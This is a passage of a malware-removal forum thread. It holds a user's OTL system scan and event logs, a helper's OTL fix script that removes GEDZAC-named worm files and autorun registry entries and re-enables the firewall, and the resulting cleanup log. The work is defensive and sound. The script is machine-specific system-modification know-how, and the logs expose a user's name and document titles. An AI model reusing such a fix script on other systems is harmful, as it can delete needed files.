"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
"{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
"{26A24AE4-039D-4CA4-87B4-2F83216022FF}" = Java™ 6 Update 22
"{3108C217-BE83-42E4-AE9E-A56A2A92E549}" = Atheros Communications Inc.® AR81Family Gigabit/Fast Ethernet Driver
"{3175E049-F9A9-4A3D-8F19-AC9FB04514D1}" = Windows Live Communications Platform
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
"{399C37FB-08AF-493B-BFED-20FBD85EDF7F}" = WebCam
"{3E171899-0175-47CC-84C4-562ACDD4C021}" = OpenOffice.org 3.3
"{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
"{474F25F5-BDC9-40E5-B1B6-F6BF23FC106F}" = Windows Live Essentials
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{529125EF-E3AC-4B74-97E6-F688A7C0F1BF}" = Paint.NET v3.5.10
"{5EE7D259-D137-4438-9A5F-42F432EC0421}" = VC80CRTRedist - 8.0.50727.4053
"{612C34C7-5E90-47D8-9B5C-0F717DD82726}" = swMSM
"{6D9021DC-CF1B-4148-8C80-6D8E8A8A33EB}" = Video Web Camera
"{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
"{7CAC6A44-C3DE-4153-ACA6-7524602C789E}" = Facebook Video Calling 1.2.0.159
"{7F811A54-5A09-4579-90E1-C93498E230D9}" = Gateway Recovery Management
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
"{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
"{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{9068B2BE-D93A-4C0A-861C-5E35E2C0E09E}" = Intel® Matrix Storage Manager
"{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
"{96AE7E41-E34E-47D0-AC07-1091A8127911}" = USB2.0 Card Reader Software
"{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
"{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
"{AA59DDE4-B672-4621-A016-4C248204957A}" = Skype™ 5.5
"{B57EAFF2-D6EE-4C6C-9175-ED9F17BFC1BC}" = Windows Live Messenger
"{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
"{C19BE821-89B1-4A96-AC7C-873810C0CB5F}" = ContentSAFER for Wizmax
"{C20CE592-B0F8-4D20-BF31-0151CA6331A6}" = EmoDio
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}" = Microsoft .NET Framework 1.1
"{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
"{DF47ACA3-7C78-4C08-8007-AC682563C9F1}" = Samsung AllShare
"{E6158D07-2637-4ECF-B576-37C489669174}" = Windows Live Call
"{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
"{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
"Adobe Flash Player ActiveX" = Adobe Flash Player 10 ActiveX
"Adobe Flash Player Plugin" = Adobe Flash Player 11 Plugin
"Adobe Shockwave Player" = Adobe Shockwave Player 11.6
"Age of Empires" = Microsoft Age of Empires
"Audacity_is1" = Audacity 1.2.6
"Broadband" = Broadband
"DAEMON Tools Lite" = DAEMON Tools Lite
"DivX Setup.divx.com" = DivX Setup
"ENTERPRISE" = Microsoft Office Enterprise 2007
"Foxit Phantom" = Foxit Phantom
"HDMI" = Intel® Graphics Media Accelerator Driver
"InstallShield_{C20CE592-B0F8-4D20-BF31-0151CA6331A6}" = EmoDio
"InstallShield_{DF47ACA3-7C78-4C08-8007-AC682563C9F1}" = Samsung AllShare
"LManager" = Launch Manager
"Malwarebytes' Anti-Malware_is1" = Malwarebytes Anti-Malware version 1.60.0.1800
"Microsoft .NET Framework 1.1 (1033)" = Microsoft .NET Framework 1.1
"Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
"Mozilla Firefox 8.0 (x86 en-US)" = Mozilla Firefox 8.0 (x86 en-US)
"SynTPDeinstKey" = Synaptics Pointing Device Driver
"uTorrent" = µTorrent
"ViStart" = ViStart
"Wdf01007" = Microsoft Kernel-Mode Driver Framework Feature Pack 1.7
"Windows Media Format Runtime" = Windows Media Format Runtime
"Windows Media Player" = Windows Media Player 10
"WinLiveSuite_Wave3" = Windows Live Essentials
"Zero Assumption Recovery_is1" = Zero Assumption Recovery Version 9

========== HKEY_USERS Uninstall List ==========

[HKEY_USERS\S-1-5-21-1313911845-3924064129-568730901-1006\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"Dropbox" = Dropbox
"Google Chrome" = Google Chrome

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 12/05/2012 2:12:22 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 5:56:13 PM | Computer Name = GATEWAY | Source = Google Update | ID = 20
Description =

Error - 12/05/2012 7:22:23 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:29:13 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:31:31 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 7:43:18 PM | Computer Name = GATEWAY | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 7:45:24 PM | Computer Name = GATEWAY | Source = Application Error | ID = 1000
Description = Faulting application vistart.exe, version 1.6.0.3804, faulting module
unknown, version 0.0.0.0, fault address 0x0c408bdc.

Error - 12/05/2012 8:15:26 PM | Computer Name = FELIX | Source = JavaQuickStarterService | ID = 1
Description =

Error - 12/05/2012 8:28:10 PM | Computer Name = FELIX | Source = CardSpace 3.0.0.0 | ID = 327949
Description = The Windows CardSpace service is too busy to process this request.
User has too many outstanding requests. Additional Information: at System.Environment.GetStackTrace(Exception
e, Boolean needFileInfo) at System.Environment.get_StackTrace() at Microsoft.InfoCards.Diagnostics.InfoCardTrace.BuildMessage(InfoCardBaseException
ie) at Microsoft.InfoCards.Diagnostics.InfoCardTrace.TraceAndLogException(Exception
e) at Microsoft.InfoCards.Diagnostics.InfoCardTrace.ThrowHelperError(Exception
e) at Microsoft.InfoCards.UIAgentMonitor.AddNewClient(UIAgentMonitorHandle handle)

at Microsoft.InfoCards.UIAgentMonitorHandle.CreateAgent(Int32 callerPid, WindowsIdentity
callerIdentity, Int32 tsSessionId) at Microsoft.InfoCards.RequestFactory.CreateClientRequestInstance(UIAgentMonitorHandle
monitorHandle, String reqName, IntPtr rpcHandle, Stream inStream, Stream outStream)

at Microsoft.InfoCards.RequestFactory.ProcessNewRequest(Int32 parentRequestHandle,
IntPtr rpcHandle, IntPtr inArgs, IntPtr& outArgs)

Error - 13/05/2012 11:01:21 AM | Computer Name = FELIX | Source = JavaQuickStarterService | ID = 1
Description =

[ OSession Events ]
Error - 30/11/2011 9:05:04 PM | Computer Name = GATEWAY | Source = Microsoft Office 12 Sessions | ID = 7001
Description = ID: 1, Application Name: Microsoft Office Excel, Application Version:
12.0.4518.1014, Microsoft Office Version: 12.0.4518.1014. This session lasted 2260
seconds with 0 seconds of active time. This session ended with a crash.

[ System Events ]
Error - 12/05/2012 1:56:18 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 2:09:47 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:12:37 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7034
Description = The Microsoft Forefront UAG Quarantine Enforcement Client service
terminated unexpectedly. It has done this 1 time(s).

Error - 12/05/2012 7:22:27 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:29:14 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 7:29:44 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7034
Description = The Microsoft Forefront UAG Quarantine Enforcement Client service
terminated unexpectedly. It has done this 1 time(s).

Error - 12/05/2012 7:30:16 PM | Computer Name = GATEWAY | Source = NapAgent | ID = 12
Description = The enforcement client 79622 failed the call to NapEnforcementClientCallback::NotifySoHChange.

Error - 12/05/2012 7:43:19 PM | Computer Name = GATEWAY | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 12/05/2012 8:15:28 PM | Computer Name = FELIX | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).

Error - 13/05/2012 11:01:27 AM | Computer Name = FELIX | Source = Service Control Manager | ID = 7024
Description = The Java Quick Starter service terminated with service-specific error
1 (0x1).


< End of report >

Attached Files


Edited by worries, 13 May 2012 - 01:23 PM.


#13 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,307 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:05:41 PM

Posted 13 May 2012 - 10:36 PM

Hello,



STEP 1



Please download DummyCreator.zip and unzip it.
  • Run the tool.
  • Copy and paste the following into the edit box:

    C:\WINDOWS\3628639882
  • Press Create button and post the content of the Result.txt.

    Important: Restart the computer.



STEP 2



We need to run an OTL Fix



  • Please reopen Posted Image on your desktop.
  • Copy and Paste the following code into the Posted Image textbox. Do not include the word "Code"
    :OTL
    PRC - [2012/05/12 20:31:28 | 000,030,721 | ---- | M] (GEDZAC) -- C:\WINDOWS\system32\sendi.exe
    PRC - [2012/05/12 20:14:05 | 000,017,409 | ---- | M] (GEDZAC LABS) -- C:\WINDOWS\system32\regsrv.exe
    DRV - File not found [Kernel | On_Demand | Stopped] -- C:\ComboFix\catchme.sys -- (catchme)
    DRV - File not found [Kernel | On_Demand | Unknown] -- C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys -- (aswMBR)
    O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - No CLSID value found.
    O4 - HKLM..\Run: [Israfel] C:\WINDOWS\system32\Israfel.vbs ()
    O4 - HKLM..\Run: [Kernel32] C:\WINDOWS\system32\Kernel32.win ()
    O6 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System: DisableRegistryTools = 1
    [2012/05/12 20:31:27 | 000,030,721 | ---- | C] (GEDZAC) -- C:\WINDOWS\System32\sendi.exe
    [2012/05/12 20:14:04 | 000,017,409 | ---- | C] (GEDZAC LABS) -- C:\WINDOWS\System32\regsrv.exe
    [2012/03/01 01:21:53 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\Annie\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | C] -- C:\Documents and Settings\All Users\Application Data\Babylon
    [2012/05/13 11:18:17 | 000,000,354 | ---- | M] () -- C:\Estigma.hta
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Israfel.vbs
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\hta.vbs
    [2012/05/13 11:17:53 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\GEDZAC.vbs
    [2012/05/13 11:17:53 | 000,123,897 | ---- | M] () -- C:\WINDOWS\System32\FILEZIP.ZIP
    [2012/05/13 11:17:51 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\File.vbs
    [2012/05/13 11:17:14 | 000,272,349 | ---- | M] () -- C:\WINDOWS\DelShortcut.vbs
    [2012/05/13 11:16:15 | 000,002,913 | ---- | M] () -- C:\WINDOWS\wininit.ini
    [2012/05/13 11:02:05 | 000,002,333 | ---- | M] () -- C:\WINDOWS\System32\ixn.dat
    [2012/05/13 11:02:05 | 000,001,201 | ---- | M] () -- C:\WINDOWS\System32\ix.dat
    [2012/05/13 11:01:30 | 000,272,588 | ---- | M] () -- C:\WINDOWS\System32\Template.htm
    [2012/05/13 11:01:30 | 000,002,268 | ---- | M] () -- C:\WINDOWS\System32\iwn.dat
    [2012/05/13 11:01:30 | 000,001,372 | ---- | M] () -- C:\WINDOWS\System32\iw.dat
    [2012/05/11 11:22:21 | 000,012,549 | ---- | M] () -- C:\WINDOWS\System32\AvrilLavigne.jpg
    [2012/03/01 10:42:56 | 000,272,349 | ---- | M] () -- C:\WINDOWS\System32\Kernel32.win
    [2012/03/01 01:22:07 | 000,000,237 | ---- | M] () -- C:\user.js
    [2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
    [2012/01/08 06:25:37 | 000,004,068 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55
    [2011/12/05 13:26:19 | 000,042,167 | ---- | C] () -- C:\WINDOWS\System32\pkzip.exe
    [2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
    [2011/07/31 13:54:04 | 000,001,424 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\mkbr.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\lrgv.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\foph.exe
    [2011/07/31 13:54:04 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\bvbt.exe
    [2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270
    [2011/07/30 17:55:28 | 000,002,506 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270
    [2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452
    [2011/07/29 22:30:53 | 000,001,476 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\wshs.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\jbpy.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\fnqu.exe
    [2011/07/29 22:30:52 | 000,000,000 | ---- | C] () -- C:\Documents and Settings\All Users\Application Data\ejbt.exe
    [2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k
    [2011/07/24 22:27:39 | 000,002,976 | -HS- | C] () -- C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k
    [2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\All Users\Application Data\Babylon
    [2012/03/01 01:21:52 | 000,000,000 | ---D | M] -- C:\Documents and Settings\Annie\Application Data\Babylon
    @Alternate Data Stream - 816 bytes -> C:\WINDOWS\3628639882:1968813863.exe
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes
    @Alternate Data Stream - 67 bytes -> C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes
    @Alternate Data Stream - 65 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes
    @Alternate Data Stream - 58 bytes -> C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes
    @Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes
    @Alternate Data Stream - 153 bytes -> C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes
    :reg
    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]
    "EnableFirewall"=dword:00000001
    "DisableNotifications"=dword:00000000
    :commands
    [emptytemp]
    
  • Push Posted Image
  • OTL may ask to reboot the machine. Please do so if asked.
  • Click Posted Image.
  • A report will open. Copy and Paste that report in your next reply.
  • If a report is not shown please navigate to the C:\_OTL\MovedFiles folder, and open the newest .log file present.
  • Copy/paste the content of the log back here in your next post.



Regards,
Georgi

cXfZ4wS.png


#14 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 14 May 2012 - 05:12 PM

Here is Result.txt

DummyCreator by Farbar
Ran by Annie (administrator) on 14-05-2012 at 18:12:01
**************************************************************

C:\WINDOWS\3628639882 [14-05-2012 18:12:01]

== End of log ==

#15 worries

worries
  • Topic Starter

  • Members
  • 47 posts
  • OFFLINE
  •  
  • Local time:09:41 AM

Posted 14 May 2012 - 05:51 PM

OTL

All processes killed
========== OTL ==========
No active process named sendi.exe was found!
No active process named regsrv.exe was found!
Service catchme stopped successfully!
Service catchme deleted successfully!
File C:\ComboFix\catchme.sys not found.
Error: No service named aswMBR was found to stop!
Service\Driver key aswMBR not found.
File C:\DOCUME~1\Annie\LOCALS~1\Temp\aswMBR.sys not found.
Registry key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{5C255C8A-E604-49b4-9D64-90988571CECB}\ deleted successfully.
Registry key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5C255C8A-E604-49b4-9D64-90988571CECB}\ not found.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\Israfel deleted successfully.
C:\WINDOWS\system32\Israfel.vbs moved successfully.
Registry value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\\Kernel32 deleted successfully.
C:\WINDOWS\system32\Kernel32.win moved successfully.
Registry value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\System\\DisableRegistryTools deleted successfully.
C:\WINDOWS\system32\sendi.exe moved successfully.
C:\WINDOWS\system32\regsrv.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon\Setup\HtmlScreens folder moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon\Setup folder moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\Babylon folder moved successfully.
C:\Documents and Settings\Annie\Application Data\Babylon folder moved successfully.
C:\Documents and Settings\All Users\Application Data\Babylon folder moved successfully.
C:\Estigma.hta moved successfully.
File C:\WINDOWS\System32\Israfel.vbs not found.
C:\WINDOWS\system32\hta.vbs moved successfully.
C:\WINDOWS\system32\GEDZAC.vbs moved successfully.
C:\WINDOWS\system32\FILEZIP.ZIP moved successfully.
C:\WINDOWS\system32\File.vbs moved successfully.
C:\WINDOWS\DelShortcut.vbs moved successfully.
C:\WINDOWS\wininit.ini moved successfully.
C:\WINDOWS\system32\ixn.dat moved successfully.
C:\WINDOWS\system32\ix.dat moved successfully.
C:\WINDOWS\system32\Template.htm moved successfully.
C:\WINDOWS\system32\iwn.dat moved successfully.
C:\WINDOWS\system32\iw.dat moved successfully.
C:\WINDOWS\system32\AvrilLavigne.jpg moved successfully.
File C:\WINDOWS\System32\Kernel32.win not found.
C:\user.js moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55 moved successfully.
C:\Documents and Settings\All Users\Application Data\63ynjb80v385pk1lf3udo74n4i4j70612ipt5767l3yn55 moved successfully.
C:\WINDOWS\system32\pkzip.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x moved successfully.
C:\Documents and Settings\All Users\Application Data\q4w5atop854221178p4s43u6s2tu243ddo8w17k752x moved successfully.
C:\Documents and Settings\All Users\Application Data\mkbr.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\lrgv.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\foph.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\bvbt.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\8w1q6yk7g38oh2v5al00mcc5270 moved successfully.
C:\Documents and Settings\All Users\Application Data\8w1q6yk7g38oh2v5al00mcc5270 moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\pb34h3q1wypq8y6bh452 moved successfully.
C:\Documents and Settings\All Users\Application Data\pb34h3q1wypq8y6bh452 moved successfully.
C:\Documents and Settings\All Users\Application Data\wshs.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\jbpy.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\fnqu.exe moved successfully.
C:\Documents and Settings\All Users\Application Data\ejbt.exe moved successfully.
C:\Documents and Settings\Annie\Local Settings\Application Data\2w5cl4dh4n20b1k moved successfully.
C:\Documents and Settings\All Users\Application Data\2w5cl4dh4n20b1k moved successfully.
Folder C:\Documents and Settings\All Users\Application Data\Babylon\ not found.
Folder C:\Documents and Settings\Annie\Application Data\Babylon\ not found.
Unable to delete ADS C:\WINDOWS\3628639882:1968813863.exe .
ADS C:\Documents and Settings\Annie\Desktop\TR CA 4521 Bessen 2009.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\TR CA 1188 Co 2003.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Thom.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Kappa.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Level2 Kappa (Thom Ringer's conflicted copy 2012-02-08).xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Data Abstraction Thom.xls:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Critical Appraisal Tracking SS.xlsx:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Quality Assessment Tool_2010_2.pdf:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\TR CA 1171 Banait 2002.doc:com.dropbox.attributes deleted successfully.
ADS C:\Documents and Settings\Annie\Desktop\Critical Appraisal Template.dot:com.dropbox.attributes deleted successfully.
========== REGISTRY ==========
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\\"EnableFirewall"|dword:00000001 /E : value set successfully!
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\\"DisableNotifications"|dword:00000000 /E : value set successfully!
========== COMMANDS ==========

[EMPTYTEMP]

User: Administrator
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 67 bytes
->FireFox cache emptied: 5643951 bytes
->Flash cache emptied: 321 bytes

User: All Users

User: Annie
->Temp folder emptied: 60148644 bytes
->Temporary Internet Files folder emptied: 63540495 bytes
->Java cache emptied: 15640437 bytes
->FireFox cache emptied: 1167049589 bytes
->Google Chrome cache emptied: 7874552 bytes
->Flash cache emptied: 185644 bytes

User: Default User
->Temp folder emptied: 16392656 bytes
->Temporary Internet Files folder emptied: 33170 bytes
->Flash cache emptied: 321 bytes

User: LocalService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 32902 bytes

User: NetworkService
->Temp folder emptied: 0 bytes
->Temporary Internet Files folder emptied: 67 bytes

%systemdrive% .tmp files removed: 0 bytes
%systemroot% .tmp files removed: 0 bytes
%systemroot%\System32 .tmp files removed: 2577 bytes
%systemroot%\System32\dllcache .tmp files removed: 0 bytes
%systemroot%\System32\drivers .tmp files removed: 0 bytes
Windows Temp folder emptied: 178506 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
%systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 33438 bytes
RecycleBin emptied: 2326186 bytes

Total Files Cleaned = 1,277.00 mb


OTL by OldTimer - Version 3.2.42.3 log created on 05142012_182242

Files\Folders moved on Reboot...

Registry entries deleted on Reboot...




0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users